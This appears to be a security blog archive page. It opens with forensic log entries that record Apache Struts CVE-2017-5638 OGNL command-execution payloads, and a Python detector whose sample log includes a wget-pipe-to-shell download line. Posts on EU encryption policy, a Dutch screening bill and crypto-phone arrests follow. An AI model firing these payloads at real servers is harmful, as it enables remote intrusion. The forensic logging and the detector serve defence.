blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

UPDATE 2018-02-10: more log entries in February 2018; the first one lists struts-pwn, a tool to test systems for CVE-2017-5638 (and perform remote command execution) that was released 11 months ago:

blog.cyberwar.nl-forensic.log:+31342:5a36c21f:65|GET / HTTP/1.1|Host:149.210.129.7|Connection:keep-alive|Accept-Encoding:gzip, deflate|Accept:*/*|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tokjuoq','tokjuoq')}.multipart/form-data
blog.cyberwar.nl-forensic.log:+536:5a7ee6a9:7d|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/ HTTP/1.1|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ("c9fd5ad9-e018-4118-9b93-6ed84ee84121"),#matt.getWriter().flush(),#matt.getWriter().close())}|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
blog.cyberwar.nl-forensic.log:+28292:5a7ee6a9:162|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D HTTP/1.1|User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
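Added detection example (not code from the post): a small Python scanner over the post's "|"-separated forensic log format that decodes the Content-Type header, flags the OGNL markers, separates the echo probes from download-and-run attempts and pulls out the second-stage URLs. The sample log lines, file name, addresses and probe token are constructed placeholders.

```python
"""Flag CVE-2017-5638 (Apache Struts OGNL in Content-Type) attempts in the
"|"-separated forensic log format shown above. Added example, not code from
the original post; the sample lines are constructed with RFC 5737 placeholder
addresses and a placeholder probe token."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log in the post's format: one "echo" probe, one
# download-and-run attempt, one struts-pwn style header check, one benign
# multipart request. As in the post, "|" inside header values is %7c-encoded.
SAMPLE_LOG = """\
example.log:+1:00000001:10|GET / HTTP/1.1|Host:192.0.2.10|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='echo Struts2045').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}|User-Agent:Mozilla/5.0
example.log:+2:00000002:10|GET / HTTP/1.1|Host:192.0.2.10|Content-Type:%25{(#_='multipart/form-data').(#cmd='wget -qO - http%3a//198.51.100.7/payload %7c sh').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}|User-Agent:Mozilla/5.0
example.log:+3:00000003:10|GET / HTTP/1.1|Host:192.0.2.10|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('probe','probe')}.multipart/form-data
example.log:+4:00000004:10|GET /index.html HTTP/1.1|Host:192.0.2.10|Content-Type:multipart/form-data; boundary=abc|User-Agent:Mozilla/5.0
"""

# Any of these in a (decoded) Content-Type means an OGNL expression, never a
# legitimate media type.
OGNL_MARKERS = ("%{", "ognl.OgnlContext", "com.opensymphony.xwork2",
                "ProcessBuilder", "#_memberAccess")
# First word of the download-and-run commands seen in such payloads.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|fetch|certutil|powershell|bitsadmin)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\";|]+")


def parse_line(line):
    """Split one log line into source, request line and a lower-cased header map."""
    fields = line.rstrip("\n").split("|")
    if len(fields) < 2:
        return None
    headers = {}
    for field in fields[2:]:
        name, sep, value = field.partition(":")
        if sep:
            headers[name.strip().lower()] = value
    return {"source": fields[0], "request": fields[1], "headers": headers}


def classify(rec):
    """Return a finding for an OGNL-bearing request, or None for a benign one."""
    ct = unquote(rec["headers"].get("content-type", ""))  # %25{ -> %{, %3a -> :
    if not any(marker in ct for marker in OGNL_MARKERS):
        return None
    match = re.search(r"#cmd='([^']*)'", ct)
    cmd = match.group(1) if match else None
    if cmd is None or "ProcessBuilder" not in ct:
        kind = "ognl-probe"            # e.g. struts-pwn addHeader check, no OS command
    elif DOWNLOADER_RE.search(cmd):
        kind = "download-and-execute"  # fetches and runs a second stage
    else:
        kind = "command-probe"         # typically "echo <token>" to confirm exposure
    return {
        "source": rec["source"],
        "kind": kind,
        "cmd": cmd,
        "urls": URL_RE.findall(cmd or ""),  # second-stage URLs to block or hunt for
        "user_agent": unquote(rec["headers"].get("user-agent", "")),
    }


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify(rec)
        if finding is not None:
            findings.append(finding)
    return findings


def summarize(findings):
    """Count findings per kind, like the post's download-vs-echo split."""
    return dict(Counter(f["kind"] for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['source']}: {f['kind']} cmd={f['cmd']!r} urls={f['urls']}")
    print(summarize(scan(SAMPLE_LOG)))
```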


Calling Bullshit in the Age of Big Data – free/open lectures, tools and case-studies from Washington U Spring 2017 class

The University of Washington had a Spring 2017 class entitled “Calling Bullshit in the Age of Big Data” and makes available the lecture materials at www.callingbullshit.org (Syllabus, Videos, Tools, Case Studies, FAQ).

Lecture titles:

  1. Introduction to bullshit
  2. Spotting bullshit
  3. The natural ecology of bullshit
  4. Causality
  5. Statistical traps
  6. Visualization
  7. Big data
  8. Publication bias
  9. Predatory publishing and scientific misconduct
  10. The ethics of calling bullshit
  11. Fake news
  12. Refuting bullshit

The course (Twitter: @callin_bull) was created by (mathematical) biology professor Carl T. Bergstrom (Twitter: @CT_Bergstrom) and associate professor data science and ‘science of science’ Jevin West (Twitter: @JevinWest), both affiliated with the University of Washington.

Coverage at The New Yorker: How to Call B.S. on Big Data: A Practical Guide (this link was posted at Hacker News).

Coverage at Salon.com: Explosive growth in bulls**t studies! The latest academic frontier in the age of You Know Who.

Further reading:


EU LIBE proposes end-to-end encryption in e-Communications; and, re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

This post shortly highlights two developments regarding EU internet privacy/security.

1. EU LIBE proposes amendment of draft e-Communications regulation to promote end-to-end encryption, seeks prohibition of Member State legislation that would “[weaken] security and encryption”

The EU LIBE Committee released a draft report (.pdf), dated June 9th 2017, on the proposed e-Communications regulation, and specifically promotes end-to-end encryption in Amendment 116:

“The providers of electronic communications services shall ensure that there is sufficient protection in place against unauthorised access or alterations to the electronic communications data, and that the confidentiality and safety of the transmission are also guaranteed by the nature of the means of transmission used or by state-of-the-art end-to-end encryption of the electronic communications data. (…)”

The remainder of that amendment seeks prohibition of nation-level legislation that would “[weaken] security and encryption of their networks and services”:

“The Furthermore, when encryption of electronic communications data is used, decryption, reverse engineering or monitoring of such communications shall be prohibited. Member States shall not impose any obligations on electronic communications service providers that would result in the weakening of the security and encryption of their networks and services.

This, of course, is at odds with interests regarding intelligence & security, which range from the ability to detect & thwart computer network attack/exploitation to the ability to detect and monitor plans to sabotage or steal military equipment or dual-use goods (Wassenaar). It is certainly different from the direction in which the European Commission has been heading for years; to that end, also take a look at The Effect of Encryption on Lawful Access to Communications and Data (.pdf, February 2017, Center for Int’l Security Studies; by Lewis, Zheng & Carter).

The promotion of end-to-end encryption by EU LIBE is not unexpected: part 2 of the STOA study “Mass Surveillance”, dated January 2015, recommended the promotion of end-to-end encryption, and provided several policy options for that. Specifically, see the last paragraph of the following section in the management summary (all emphasis is original):

(…)

Policy options for the ‘Promote adoption’ scenario

Promote end-to-end encryption

Stimulate awareness of the necessity of using encryption by initiating a media campaign, as awareness of privacy risks is quite low.

Increase the knowledge level of end-users, both individuals and responsible departments in organisations, by setting up an independent platform where users can find information on tools, implementation, do’s and don’ts etc.

Support product security tests by independent institutions such as the Electronic Frontier Foundation that help users make better-informed choices. Support can be a financial contribution, but also promotion of the results. Alternatively the EU can set up its own regular product security test programme.

A parallel option is to stimulate user-friendliness of end-to-end encryption solutions, for instance by promoting existing user-friendly end-to-end encryption solutions for e-mail, messaging, chat etc. Dedicated funding or participation in open-source software end-to-end encryption solutions is also an option to specifically improve user-friendliness.

If the market does not provide security with end-to-end encryption by itself, regulation should be considered, obliging service providers and/or Internet service providers to provide end-to-end protection as standard for data in transit. An additional benefit of regulation would be a concrete political discussion on the balance between privacy and law enforcement and national security, at European and/or national level. The outcome of this debate should be implemented in national legislation.

(…)

I’m not sure what LIBE’s intent / expectation is wrt Amendment 116; to me, it looks like something that is not intended to be adopted “as is” as part of the e-Communications regulation, but rather as something to stimulate debate, which could have a beneficial effect on the final regulation. But I may be wrong.

2. Re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

On June 13th 2017, the Article 29 Working Party (“WP29”) released a press statement (.pdf), entitled “Preparation of the Privacy Shield annual Joint Review”, that references bulk collection, e.g. of communication or databases containing data about persons, in relation to the EU/US Privacy Shield:

“Regarding the law enforcement and national security part, the WP 29 has questions relating in particular to the latest developments of US law and jurisprudence in the field of privacy. The WP29 also seeks, inter alia, precise evidence to show that bulk collection, when it exists, is “as tailored as feasible”, limited and proportionate. In addition, the WP29 stresses the need to obtain information concerning the nomination of the four missing members of the PCLOB as well as on the appointment of the Ombudsperson and the procedures governing the Ombudsperson mechanism, as they are key elements of the oversight architecture of the Privacy Shield.”

Tip of the Hat to Bavo Van den Heuvel (Twitter: @BavoCranium), who highlighted this in a post on LinkedIn.

Unrelated side note: the revision of the Dutch Intelligence & Security Act of 2002 (“Wiv2002”), tentatively referred to as “Wiv20xx”, expands the Wiv2002 such that the Dutch intelligence and security services (domestic: AIVD; military: MIVD) can perform untargeted / bulk search interception of cable communications, and explicitly allows acquisition of bulk data sets through hacking or voluntary cooperation (for instance through remote access); not unlike the bulk powers in the U.K. (more). The oversight framework is significantly revised as well, for instance through the addition of ex ante oversight. The Wiv20xx was adopted by the Dutch lower house in Q1/2017 and is now being evaluated by the Dutch senate; its status in the legislative process can be seen here.


[Dutch] Bill “VOG politiegegevens”: police data as an independent ground for refusal in the VOG assessment

TL;DR: the draft bill “VOG politiegegevens” aims to make it possible to refuse a VOG (certificate of conduct) on the basis of police data as well, without there being a criminal record. The draft explanatory memorandum (MvT) states that the proposal is aimed at positions involving BOAs (special investigating officers), the DJI (Custodial Institutions Agency) and the OM (Public Prosecution Service), but the text of the draft bill does not restrict it to those positions; extension to other positions is left to an Order in Council (AMvB) and ministerial regulation (i.e., a decision by the minister, without involvement of the House of Representatives).
In the world of IT security practitioners there are situations in which there is (possibly) a need for screening that goes beyond a VOG, but in which the heavier VGB (screening by the AIVD/MIVD) is not possible: unlike a VOG screening, a client or employer cannot simply request one; that is only possible for designated positions of trust (vertrouwensfuncties). The ‘gap’ between VOG and VGB cannot, at least as far as police data are concerned, be filled by private screening companies: they have no access to police data.
Question: would it be desirable to extend the scope of this bill to positions in the private sector, and if so, what could an assessment framework look like for deciding to refuse a VOG on the basis of police data to persons who are involved in, for example, red teaming, penetration tests and vulnerability scans, and who as such regularly, and sometimes at a high level, have or may acquire access rights to data, systems and networks? Think, for example, of a dismissed case concerning computer crime: the presumption of innocence versus the interests at stake in a VGB assessment.

The draft bill “Verklaring Omtrent Gedrag (VOG) politiegegevens”, which is currently in consultation (closing date: 12 July 2017), concerns extending the grounds for refusing a VOG from judicial/criminal-procedure data to police data. Judicial/criminal-procedure data concern decisions of the OM and the courts (read: criminal record), and data collected at the level of the OM and the judiciary. Police data are much broader: “any personal data processed in the context of the performance of the police task” (Article 35, first paragraph, Wjsg).

The aim is to make it possible to use police data as an independent ground for refusal in the VOG assessment, at least for positions that meet criteria to be laid down by Order in Council (AMvB) and to be specified by ministerial regulation. The draft Explanatory Memorandum (MvT) of 7 March 2017 accompanying the bill states:

“(…) For these positions, positions within the security domain such as at the DJI, BOAs and the OM are currently envisaged. For persons in a position that requires a high degree of integrity, a different period already applies for the data that may be weighed in the assessment of the VOG application. For these positions the look-back period is not limited to the standard period of four years, but is longer. In principle a look-back period of ten years applies, as is the case for BOAs. For certain positions, such as institutional staff of the DJI, this period has been further extended to thirty years in the Beleidsregels VOG NP-RP 2013.”

An example is then given:

“I would like to give an example of a case of a person in a position that requires a high degree of integrity, in which police data could apply as an independent ground for refusal in the VOG assessment. It concerns a case in which the police data show that a prospective BOA provoked a violent incident in a catering establishment. The person concerned was demonstrably under the influence of alcohol and possibly also of drugs. The police were on the scene and took the man in for questioning and a breathalyser test. If, in addition, it turns out that according to police information the man has repeatedly been observed drunk in nightlife venues that are moreover known for frequent use of and trade in hard drugs, this may be relevant to the assessment of his VOG application. After all, persons in a (future) position that requires a high degree of integrity may be expected to have an impeccable history.”

The bill concerns the following police data:

(…) For persons in the positions referred to, police data indicating improper conduct may be relevant, even though no prosecution has (yet) been instituted or conviction has taken place. Because of the irreproachable conduct such a person must display, the choice has been made to provide the police data referred to in Articles 8, 9, 10(1)(a) and (c), and 13 of the Wpg. This means that in the assessment of a VOG that can be refused on the basis of police data, use may be made of the following police data:

  1. police data processed with a view to the performance of the daily police task (Article 8 Wpg);
  2. police data processed for an investigation with a view to maintaining the legal order in a specific case (Article 9 Wpg);
  3. police data processed with a view to gaining insight into the involvement of persons in the planning or commission of certain serious crimes (Article 10(1)(a) Wpg);
  4. police data processed with a view to gaining insight into the involvement of persons in acts which, given their nature or frequency or the organised context in which they are committed, constitute a serious breach of public order (Article 10(1)(c) Wpg); and
  5. police data as referred to in Articles 8, 9 and 10 of the Wpg that are further processed in support of the police task (Article 13 Wpg).

The circumstances in which a VOG could be refused on the basis of police data have yet to be worked out:

“The issue of a VOG can only be refused if relevant police data exist with respect to the applicant in view of the position for which the VOG has been applied for. The mere fact that the applicant appears in the police systems is insufficient ground to refuse the issue of the VOG. In the assessment of the police data, account will be taken of, for example, the type of data, the frequency and the currency of the data. This assessment framework will be further elaborated in Justis’s VOG policy rules.”

A substantial hit rate is anticipated when police data are searched for VOG applicants (NB: it is not clear to me what this estimate is based on, or whether it concerns all VOG applications or only VOG applications for the positions the bill is currently intended for):

“Citizens can appear in the police systems in various ways. Not only as a suspect, but also as a witness, complainant or otherwise. In preparation for the bill, it is being examined further how often persons appear in the police systems.

In opting for a hit/no hit system, the police and Justis currently assume that on an annual basis 50% of VOG applications will yield a hit, and in which cases the police will be asked to send the available data.”

The draft MvT contains an estimate of the number of positions that fall within the scope of the bill (in any case): the number of applications for positions in the groups Buitengewoon Opsporingsambtenaar (BOAs), Dienst Justitiële Inrichtingen (DJI) and the OM is 16,200.

In 2016, no fewer than 950,000 VOG applications were processed in total. The draft MvT, logically, leaves open the possibility that police data could also be used as an independent ground for refusal for other positions; this can be determined by AMvB and ministerial regulation.

From my own professional field, information security, I could for instance imagine circumstances in which you would perhaps rather not see the person concerned pass the VOG assessment, despite a clean criminal record. One might think of police data linking the person to activities that fall under the Computer Crime Act (Wet Computercriminaliteit). At the same time, given the persistently high demand for experienced IT security professionals, you want to avoid a situation in which bona fide hackers who in the past (a year ago? three years ago? five years ago? longer?) carried out unsolicited research into third parties’ systems, networks and applications, where those parties filed a complaint without the OM proceeding to prosecute, could not obtain a VOG on the basis of police data about that. In my view it would be interesting, as a (premature) thought experiment, to think about what an assessment framework for refusing a VOG on the basis of police data could (and could not) look like for the IT security field. This naturally concerns not only hacking-without-conviction, but in principle all matters that may touch on reliability, potentially including radicalisation or criminal contacts.

(Side note: the heavier Verklaring van Geen Bezwaar (VGB), for which a screening is performed by the AIVD or MIVD and in which police data can also be consulted, cannot be requested from the private sector, and private screening companies have no access to police data; in that sense there is in practice a ‘gap’ between the VOG and the VGB, and it is conceivable that now or in the near future a call will come from the private sector to extend the scope of the proposed act by AMvB / ministerial regulation from BOA/DJI/OM to the private sector.)

Possible further reading:

  • Vechten tegen spoken in de mist? Over veiligheidsonderzoeken voor vertrouwensfuncties en rechtsbescherming (.pdf, 2013, Nederlands Juristenblad; by Jon Schilder, Jan-Peter Loof and Kees Sparrius; see pp. 290-298). This (legal) scholarly article concerns VGB screenings, not VOG screenings, but contains background, views and argumentation that, at least in my layman’s judgement (I am a techie, not a lawyer or policymaker), might be informative/guiding/delimiting when thinking about assessment frameworks with respect to “VOG politiegegevens”.


After Ennetcom, Dutch police makes arrests re: PGP Safe, another Dutch company, for allegedly providing crypto phones to (primarily?) the underworld

On 10 May 2017, the Dutch Public Prosecution Office published a press release (in Dutch) regarding arrests made during police investigations into businesses for allegedly providing/selling crypto phones to criminals. Earlier, the Public Prosecution Office made public their investigation into the Nijmegen-based company Ennetcom. The present investigation involves the Amsterdam-based PGP Safe. Here is my (unofficial) translation of the official press release:

New arrests in the Netherlands for providing crypto phones to the underworld

10 May 2017 – Public Prosecution Office

The police arrested four suspects on Tuesday May 9th in relation to the 26Sassenheim investigation into selling encrypted mobile phones and services to criminals. A 51-year-old man from Huizen and a 66-year-old man from Amsterdam are being detained on suspicion of money laundering. A 34-year-old man from Amsterdam and a 24-year-old man from Almere were also arrested. They would have provided support to the older men.

These are not the first arrests and detentions of providers of encrypted phones and services to the underworld. That also happened in April last year in the extensive investigation, 26DeVink, into the Ennetcom company in Nijmegen.

Crypto phones

The money laundering investigation 26Sassenheim was initiated by the Team High Tech Crime of the National Unit of the Police. The investigation is focused on two main suspects who offered products and services, primarily to criminals, under the trade mark ‘PGP Safe’. The suspects sold customized BlackBerry or Android smartphones that could only communicate in encrypted form. These phones were sold for EUR 1200 on average. The payments mostly took place in cash, on public roads.

The Public Prosecution Office suspects the men of laundering part of the yields. The two were presumably supported by family members.

Since 2014, at least 34 Dutch police investigations exist where crypto phones, that the suspects provided, played a role. The investigations involve, among others, (attempted) liquidation and international organized trade in drugs. Police and the Justice Department have clues that suggest the main suspects knew that their products and services were mostly used by criminals in committing such offenses.

Millions of Euros and luxury vehicles

The police and the National Public Prosecutor have searched buildings at eleven locations in the Netherlands. This was done in cooperation with the tax intelligence and investigation service, FIOD. The searches took place in the municipalities of Amsterdam, Huizen, Koggenland and Zandvoort in the province of North Holland, and in Almere and Zeewolde in the province of Flevoland.

A farmhouse of the suspect in Berkhout was seized, as well as a mansion in Amsterdam. The farmhouse has an estimated worth of EUR 600,000 and the building in Amsterdam has an estimated worth of EUR 1.6 million. The police have seized, in total, some 2 million Euro and thirteen vehicles, including luxury editions of Mercedes, Porsche and Audi. Hundreds of phones were found (both BlackBerry and Android phones) and a large number of SIM cards. Furthermore, 57 bank accounts in the Netherlands have been frozen. Simultaneously, the FIOD entered two administrative offices to confiscate the suspects’ bookkeeping. Several searches were also carried out abroad.

Punishable

The police and the Public Prosecution Office act against persons who (digitally) support or facilitate criminals and criminal organizations. They are prosecuted for laundering and their criminal capital is seized.

Ennetcom

Following 26DeVink, the investigation into Ennetcom, 26Sassenheim is the second large-scale criminal investigation into providers of tools and services for encrypted communication. Both providers are suspected of having provided, to a vast number of criminal customers, means and services, to communicate in encrypted form about serious crime. 26DeVink is still ongoing. It has already yielded information: some 3.6 million messages were decrypted. The investigation into the content and usability of these messages is ongoing.

The Ennetcom case involved a company located in Nijmegen (NL) that sold PGP-enabled BlackBerry phones priced at ~EUR 1500, often with camera and mic removed. According to the Public Prosecution Service, some 40,000 phones were registered (by some 19,000 users). The phones could only communicate with other phones on Ennetcom’s network, and could be remotely wiped by Ennetcom (e.g. in case the phone is lost or stolen). The phones reportedly connected to a server at an IP address that was traced to the telecommunications hub / carrier hotel at 151 Front Street West, Toronto, Canada. On April 18th 2016, a Canadian judge authorized a search of Ennetcom’s server, and “the complete key management system” was found during that search (to my knowledge it is not certain what that refers to, but Symantec PGP Universal Server — part of PGP Support for BlackBerry BES — would be the obvious guess). Data was made available by Canada to the Dutch police on September 19th 2016, which enabled the Dutch police to decrypt user messages. While it is (to my knowledge) not clear what “data” entails here, precisely, the Mutual Legal Assistance in Criminal Matters Act (Re), 2016 ONSC 5699 (CanLII) states:

The Dutch authorities also discovered that the “keys” for the PGP encryption system were generated by the server, rather than by the device. As a result, the Dutch authorities came to believe that the keys to decrypt the PGP encrypted information, on the Ennetcom PGP BlackBerry devices, are stored on Ennetcom’s BlackBerry Enterprise Servers.

So, conceivably, the actual keys were present and handed over, and that was that; although alternative scenarios cannot be ruled out, depending on how the software implements key scheduling etc., in which decryption is not immediately straightforward, but some cryptanalytic method is involved that is feasible depending on whatever other information is present (e.g. all user identifiers, all ciphertexts per user, and all associations between all users, etc.).

Ennetcom’s servers are reported to have been configured such that messages are wiped/overwritten after 48 hours; nonetheless, according to the Public Prosecution Service, some 3.6 million messages were obtained. (Note: “message” as in “instant message”, not as in “email message”; a single conversation can be made up of multiple messages.)

The Public Prosecution Service press release states that prior to seizing Ennetcom’s servers, the police sent a message to all 19,000(ish) users, requesting that if they hold a special profession (such as lawyers, doctors, notaries or clergymen), they inform the police about that (presumably for reasons of due diligence); the police did not receive any response. It is reported that the data remains under Canadian control, and cannot be shared further without court approval: “The fear is that unfettered disclosure would expose innocent people to the unjustified attention of police, just because they used an encrypted BlackBerry.”

On March 9th 2017, Ennetcom posted the following press statement:

Press release March 9th, 2017

